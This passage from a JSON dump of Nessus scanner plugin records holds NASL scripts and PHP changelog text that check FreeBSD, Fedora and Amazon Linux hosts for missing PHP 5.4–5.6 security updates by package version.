reference:\"php54-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-bcmath-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-cli-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-common-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-dba-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-debuginfo-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-devel-5.4.45-1.75.amzn1\")) flag++;\nif 
(rpm_check(release:\"ALA\", reference:\"php54-embedded-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-enchant-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-fpm-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-gd-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-imap-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-intl-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-ldap-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mbstring-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mcrypt-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mssql-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mysql-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mysqlnd-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-odbc-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-pdo-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-pgsql-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-process-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-pspell-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-recode-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-snmp-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-soap-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-tidy-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-xml-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-xmlrpc-5.4.45-1.75.amzn1\")) flag++;\n\nif (flag)\n{\n if 
(report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php54 / php54-bcmath / php54-cli / php54-common / php54-dba / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:39", "description": "PHP reports :\n\n- Core :\n\n- Fixed bug #70172 (Use After Free Vulnerability in unserialize()).\n\n- Fixed bug #70219 (Use after free vulnerability in session deserializer).\n\n- EXIF :\n\n- Fixed bug #70385 (Buffer over-read in exif_read_data with TIFF IFD tag byte value of 32 bytes).\n\n- hash :\n\n- Fixed bug #70312 (HAVAL gives wrong hashes in specific cases).\n\n- PCRE :\n\n- Fixed bug #70345 (Multiple vulnerabilities related to PCRE functions).\n\n- SOAP :\n\n- Fixed bug #70388 (SOAP serialize_function_call() type confusion / RCE).\n\n- SPL :\n\n- Fixed bug #70365 (Use-after-free vulnerability in unserialize() with SplObjectStorage).\n\n- Fixed bug #70366 (Use-after-free vulnerability in unserialize() with SplDoublyLinkedList).\n\n- XSLT :\n\n- Fixed bug #69782 (NULL pointer dereference).\n\n- ZIP :\n\n- Fixed bug #70350 (ZipArchive::extractTo allows for directory traversal when creating directories).", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-09T00:00:00", "type": "nessus", "title": "FreeBSD : php -- multiple vulnerabilities (3d675519-5654-11e5-9ad8-14dae9d210b8)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:php5", "p-cpe:/a:freebsd:freebsd:php5-soap", "p-cpe:/a:freebsd:freebsd:php5-xsl", "p-cpe:/a:freebsd:freebsd:php55", "p-cpe:/a:freebsd:freebsd:php55-soap", "p-cpe:/a:freebsd:freebsd:php55-xsl", 
"p-cpe:/a:freebsd:freebsd:php56", "p-cpe:/a:freebsd:freebsd:php56-soap", "p-cpe:/a:freebsd:freebsd:php56-xsl", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3D675519565411E59AD814DAE9D210B8.NASL", "href": "https://www.tenable.com/plugins/nessus/85859", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85859);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n\n script_name(english:\"FreeBSD : php -- multiple vulnerabilities (3d675519-5654-11e5-9ad8-14dae9d210b8)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PHP reports :\n\n- Core :\n\n- Fixed bug #70172 (Use After Free Vulnerability in unserialize()).\n\n- Fixed bug #70219 (Use after free vulnerability in session\ndeserializer).\n\n- EXIF :\n\n- Fixed bug #70385 (Buffer over-read in exif_read_data with TIFF IFD\ntag byte value of 32 bytes).\n\n- hash :\n\n- Fixed bug #70312 (HAVAL gives wrong hashes in specific cases).\n\n- PCRE :\n\n- Fixed bug #70345 (Multiple vulnerabilities related to PCRE\nfunctions).\n\n- SOAP :\n\n- Fixed bug #70388 (SOAP serialize_function_call() type confusion /\nRCE).\n\n- SPL :\n\n- Fixed bug #70365 (Use-after-free vulnerability in unserialize() with\nSplObjectStorage).\n\n- Fixed bug #70366 (Use-after-free vulnerability in unserialize() 
with\nSplDoublyLinkedList).\n\n- XSLT :\n\n- Fixed bug #69782 (NULL pointer dereference).\n\n- ZIP :\n\n- Fixed bug #70350 (ZipArchive::extractTo allows for directory\ntraversal when creating directories).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://php.net/ChangeLog-5.php#5.4.45\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://php.net/ChangeLog-5.php#5.5.29\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://php.net/ChangeLog-5.php#5.6.13\"\n );\n # https://vuxml.freebsd.org/freebsd/3d675519-5654-11e5-9ad8-14dae9d210b8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?27403633\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php55-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php55-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/03\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php5<5.4.45\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-soap<5.4.45\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-xsl<5.4.45\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php55<5.5.29\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php55-soap<5.5.29\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php55-xsl<5.5.29\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php56<5.6.13\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php56-soap<5.6.13\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php56-xsl<5.6.13\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:25", "description": "03 Sep 2015, **PHP 5.6.13** **Core:** * Fixed bug #69900 (Too long timeout on pipes). (Anatol) * Fixed bug #69487 (SAPI may truncate POST data). 
(cmb) * Fixed bug #70198 (Checking liveness does not work as expected). (Shafreeck Sea, Anatol Belski) * Fixed bug #70172 (Use After Free Vulnerability in unserialize()). (Stas) * Fixed bug #70219 (Use after free vulnerability in session deserializer). (taoguangchen at icloud dot com) **CLI server:** * Fixed bug #66606 (Sets HTTP_CONTENT_TYPE but not CONTENT_TYPE). (wusuopu, cmb) * Fixed bug #70264 (CLI server directory traversal). (cmb) **Date:** * Fixed bug #70266 (DateInterval::__construct.interval_spec is not supposed to be optional). (cmb)\n\n - Fixed bug #70277 (new DateTimeZone($foo) is ignoring text after null byte). (cmb) **EXIF:** * Fixed bug #70385 (Buffer over-read in exif_read_data with TIFF IFD tag byte value of 32 bytes). (Stas) **hash:** * Fixed bug #70312 (HAVAL gives wrong hashes in specific cases).\n (letsgolee at naver dot com) **MCrypt:** * Fixed bug #69833 (mcrypt fd caching not working). (Anatol)\n **Opcache:** * Fixed bug #70237 (Empty while and do-while segmentation fault with opcode on CLI enabled).\n (Dmitry, Laruence) **PCRE:** * Fixed bug #70232 (Incorrect bump-along behavior with \\K and empty string match). (cmb) * Fixed bug #70345 (Multiple vulnerabilities related to PCRE functions). (Anatol Belski) **SOAP:** * Fixed bug #70388 (SOAP serialize_function_call() type confusion / RCE). (Stas)\n **SPL:** * Fixed bug #70290 (NULL pointer deref (segfault) in spl_autoload via ob_start). (hugh at allthethings dot co dot nz) * Fixed bug #70303 (Incorrect constructor reflection for ArrayObject).\n (cmb) * Fixed bug #70365 (Use-after-free vulnerability in unserialize() with SplObjectStorage). (taoguangchen at icloud dot com) * Fixed bug #70366 (Use-after-free vulnerability in unserialize() with SplDoublyLinkedList). (taoguangchen at icloud dot com)\n **Standard:** * Fixed bug #70052 (getimagesize() fails for very large and very small WBMP). (cmb) * Fixed bug #70157 (parse_ini_string() segmentation fault with INI_SCANNER_TYPED). 
(Tjerk) **XSLT:** * Fixed bug #69782 (NULL pointer dereference). (Stas)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-15T00:00:00", "type": "nessus", "title": "Fedora 21 : php-5.6.13-1.fc21 (2015-14976)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2015-14976.NASL", "href": "https://www.tenable.com/plugins/nessus/85933", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-14976.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85933);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n script_xref(name:\"FEDORA\", value:\"2015-14976\");\n\n script_name(english:\"Fedora 21 : php-5.6.13-1.fc21 (2015-14976)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"03 Sep 2015, **PHP 5.6.13** **Core:** * Fixed bug #69900 (Too long\ntimeout on pipes). (Anatol) * Fixed bug #69487 (SAPI may truncate POST\ndata). 
(cmb) * Fixed bug #70198 (Checking liveness does not work as\nexpected). (Shafreeck Sea, Anatol Belski) * Fixed bug #70172 (Use\nAfter Free Vulnerability in unserialize()). (Stas) * Fixed bug #70219\n(Use after free vulnerability in session deserializer). (taoguangchen\nat icloud dot com) **CLI server:** * Fixed bug #66606 (Sets\nHTTP_CONTENT_TYPE but not CONTENT_TYPE). (wusuopu, cmb) * Fixed bug\n#70264 (CLI server directory traversal). (cmb) **Date:** * Fixed bug\n#70266 (DateInterval::__construct.interval_spec is not supposed to be\noptional). (cmb)\n\n - Fixed bug #70277 (new DateTimeZone($foo) is ignoring\n text after null byte). (cmb) **EXIF:** * Fixed bug\n #70385 (Buffer over-read in exif_read_data with TIFF IFD\n tag byte value of 32 bytes). (Stas) **hash:** * Fixed\n bug #70312 (HAVAL gives wrong hashes in specific cases).\n (letsgolee at naver dot com) **MCrypt:** * Fixed bug\n #69833 (mcrypt fd caching not working). (Anatol)\n **Opcache:** * Fixed bug #70237 (Empty while and\n do-while segmentation fault with opcode on CLI enabled).\n (Dmitry, Laruence) **PCRE:** * Fixed bug #70232\n (Incorrect bump-along behavior with \\K and empty string\n match). (cmb) * Fixed bug #70345 (Multiple\n vulnerabilities related to PCRE functions). (Anatol\n Belski) **SOAP:** * Fixed bug #70388 (SOAP\n serialize_function_call() type confusion / RCE). (Stas)\n **SPL:** * Fixed bug #70290 (NULL pointer deref\n (segfault) in spl_autoload via ob_start). (hugh at\n allthethings dot co dot nz) * Fixed bug #70303\n (Incorrect constructor reflection for ArrayObject).\n (cmb) * Fixed bug #70365 (Use-after-free vulnerability\n in unserialize() with SplObjectStorage). (taoguangchen\n at icloud dot com) * Fixed bug #70366 (Use-after-free\n vulnerability in unserialize() with\n SplDoublyLinkedList). (taoguangchen at icloud dot com)\n **Standard:** * Fixed bug #70052 (getimagesize() fails\n for very large and very small WBMP). 
(cmb) * Fixed bug\n #70157 (parse_ini_string() segmentation fault with\n INI_SCANNER_TYPED). (Tjerk) **XSLT:** * Fixed bug #69782\n (NULL pointer dereference). (Stas)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260642\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260647\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260671\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260674\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260683\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260707\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260734\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260741\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260748\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-September/166337.html\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"http://www.nessus.org/u?3071c07f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"php-5.6.13-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:28", "description": "03 Sep 2015, **PHP 5.6.13** **Core:** * Fixed bug #69900 (Too long timeout on pipes). (Anatol) * Fixed bug #69487 (SAPI may truncate POST data). (cmb) * Fixed bug #70198 (Checking liveness does not work as expected). (Shafreeck Sea, Anatol Belski) * Fixed bug #70172 (Use After Free Vulnerability in unserialize()). (Stas) * Fixed bug #70219 (Use after free vulnerability in session deserializer). (taoguangchen at icloud dot com) **CLI server:** * Fixed bug #66606 (Sets HTTP_CONTENT_TYPE but not CONTENT_TYPE). (wusuopu, cmb) * Fixed bug #70264 (CLI server directory traversal). (cmb) **Date:** * Fixed bug #70266 (DateInterval::__construct.interval_spec is not supposed to be optional). (cmb)\n\n - Fixed bug #70277 (new DateTimeZone($foo) is ignoring text after null byte). (cmb) **EXIF:** * Fixed bug #70385 (Buffer over-read in exif_read_data with TIFF IFD tag byte value of 32 bytes). (Stas) **hash:** * Fixed bug #70312 (HAVAL gives wrong hashes in specific cases).\n (letsgolee at naver dot com) **MCrypt:** * Fixed bug #69833 (mcrypt fd caching not working). 
(Anatol)\n **Opcache:** * Fixed bug #70237 (Empty while and do-while segmentation fault with opcode on CLI enabled).\n (Dmitry, Laruence) **PCRE:** * Fixed bug #70232 (Incorrect bump-along behavior with \\K and empty string match). (cmb) * Fixed bug #70345 (Multiple vulnerabilities related to PCRE functions). (Anatol Belski) **SOAP:** * Fixed bug #70388 (SOAP serialize_function_call() type confusion / RCE). (Stas)\n **SPL:** * Fixed bug #70290 (NULL pointer deref (segfault) in spl_autoload via ob_start). (hugh at allthethings dot co dot nz) * Fixed bug #70303 (Incorrect constructor reflection for ArrayObject).\n (cmb) * Fixed bug #70365 (Use-after-free vulnerability in unserialize() with SplObjectStorage). (taoguangchen at icloud dot com) * Fixed bug #70366 (Use-after-free vulnerability in unserialize() with SplDoublyLinkedList). (taoguangchen at icloud dot com)\n **Standard:** * Fixed bug #70052 (getimagesize() fails for very large and very small WBMP). (cmb) * Fixed bug #70157 (parse_ini_string() segmentation fault with INI_SCANNER_TYPED). (Tjerk) **XSLT:** * Fixed bug #69782 (NULL pointer dereference). (Stas)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-15T00:00:00", "type": "nessus", "title": "Fedora 22 : php-5.6.13-1.fc22 (2015-14977)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-14977.NASL", "href": "https://www.tenable.com/plugins/nessus/85934", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-14977.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85934);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n script_xref(name:\"FEDORA\", value:\"2015-14977\");\n\n script_name(english:\"Fedora 22 : php-5.6.13-1.fc22 (2015-14977)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"03 Sep 2015, **PHP 5.6.13** **Core:** * Fixed bug #69900 (Too long\ntimeout on pipes). (Anatol) * Fixed bug #69487 (SAPI may truncate POST\ndata). (cmb) * Fixed bug #70198 (Checking liveness does not work as\nexpected). (Shafreeck Sea, Anatol Belski) * Fixed bug #70172 (Use\nAfter Free Vulnerability in unserialize()). (Stas) * Fixed bug #70219\n(Use after free vulnerability in session deserializer). 
(taoguangchen\nat icloud dot com) **CLI server:** * Fixed bug #66606 (Sets\nHTTP_CONTENT_TYPE but not CONTENT_TYPE). (wusuopu, cmb) * Fixed bug\n#70264 (CLI server directory traversal). (cmb) **Date:** * Fixed bug\n#70266 (DateInterval::__construct.interval_spec is not supposed to be\noptional). (cmb)\n\n - Fixed bug #70277 (new DateTimeZone($foo) is ignoring\n text after null byte). (cmb) **EXIF:** * Fixed bug\n #70385 (Buffer over-read in exif_read_data with TIFF IFD\n tag byte value of 32 bytes). (Stas) **hash:** * Fixed\n bug #70312 (HAVAL gives wrong hashes in specific cases).\n (letsgolee at naver dot com) **MCrypt:** * Fixed bug\n #69833 (mcrypt fd caching not working). (Anatol)\n **Opcache:** * Fixed bug #70237 (Empty while and\n do-while segmentation fault with opcode on CLI enabled).\n (Dmitry, Laruence) **PCRE:** * Fixed bug #70232\n (Incorrect bump-along behavior with \\K and empty string\n match). (cmb) * Fixed bug #70345 (Multiple\n vulnerabilities related to PCRE functions). (Anatol\n Belski) **SOAP:** * Fixed bug #70388 (SOAP\n serialize_function_call() type confusion / RCE). (Stas)\n **SPL:** * Fixed bug #70290 (NULL pointer deref\n (segfault) in spl_autoload via ob_start). (hugh at\n allthethings dot co dot nz) * Fixed bug #70303\n (Incorrect constructor reflection for ArrayObject).\n (cmb) * Fixed bug #70365 (Use-after-free vulnerability\n in unserialize() with SplObjectStorage). (taoguangchen\n at icloud dot com) * Fixed bug #70366 (Use-after-free\n vulnerability in unserialize() with\n SplDoublyLinkedList). (taoguangchen at icloud dot com)\n **Standard:** * Fixed bug #70052 (getimagesize() fails\n for very large and very small 